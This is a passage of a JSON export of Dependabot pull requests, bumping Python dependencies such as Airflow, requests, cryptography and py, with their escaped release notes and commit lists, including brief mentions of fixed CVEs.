href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eMiscellaneous\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c99887ec11ce3e1a43f2794fcf36d27555140f00\"\u003e\u003ccode\u003ec99887e\u003c/code\u003e\u003c/a\u003e Update RELEASE_NOTES.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/1c7fba76ec613517632931d5a268029ad24b33cb\"\u003e\u003ccode\u003e1c7fba7\u003c/code\u003e\u003c/a\u003e mark test_task_workflow_trigger_success as flaky (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42972\"\u003e#42972\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43580\"\u003e#43580\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/08bbf89225b9b87521044fa04a9666690792a4cb\"\u003e\u003ccode\u003e08bbf89\u003c/code\u003e\u003c/a\u003e FIX: Don't raise a warning in ExecutorSafeguard when execute is called from a...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7e86bf85d3bd6fda387f0a5b189f382c0673f611\"\u003e\u003ccode\u003e7e86bf8\u003c/code\u003e\u003c/a\u003e Mark all tasks as skipped when failing a dag_run manually including t… (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/8e79c7a27f1fdb465afdd1d4de0de7d607a27357\"\u003e\u003ccode\u003e8e79c7a\u003c/code\u003e\u003c/a\u003e Fix TrySelector for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/c12e6284c1a769da58903f076b93a32b185b12f1\"\u003e\u003ccode\u003ec12e628\u003c/code\u003e\u003c/a\u003e Conditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/898f332773772fea5ae76182c5393f14d212ddf8\"\u003e\u003ccode\u003e898f332\u003c/code\u003e\u003c/a\u003e Fix broken stat scheduler_loop_duration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/7aea4b56d76e80ee65613b851b5a9898df56d79a\"\u003e\u003ccode\u003e7aea4b5\u003c/code\u003e\u003c/a\u003e Ensure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/9c044ea2a25240f7cc28b6e20337c2c4dc6e1e78\"\u003e\u003ccode\u003e9c044ea\u003c/code\u003e\u003c/a\u003e include limit and offset in request body schema for List task instances (batc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/apache/airflow/commit/dd296c5338150cebe24c1edb46ba5a944f82a5eb\"\u003e\u003ccode\u003edd296c5\u003c/code\u003e\u003c/a\u003e This PR resolves an SQLAlchemy warning in the migration by correctly setting ...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/apache/airflow/compare/2.6.3...2.10.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.31.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd6...\n\n_Description has been truncated_","html_url":"https://github.com/Reality2byte/python-docs-samples/pull/28","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Reality2byte%2Fpython-docs-samples/issues/28","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/28/packages"},{"uuid":"2580482452","node_id":"PR_kwDOHEePGc6ZzwmU","number":1592,"state":"open","title":"build(deps): bump the pip group across 1 directory with 3 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T08:23:14.000Z","updated_at":"2025-07-10T20:33:57.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":3,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 3 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py) and [requests](https://github.com/psf/requests).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca 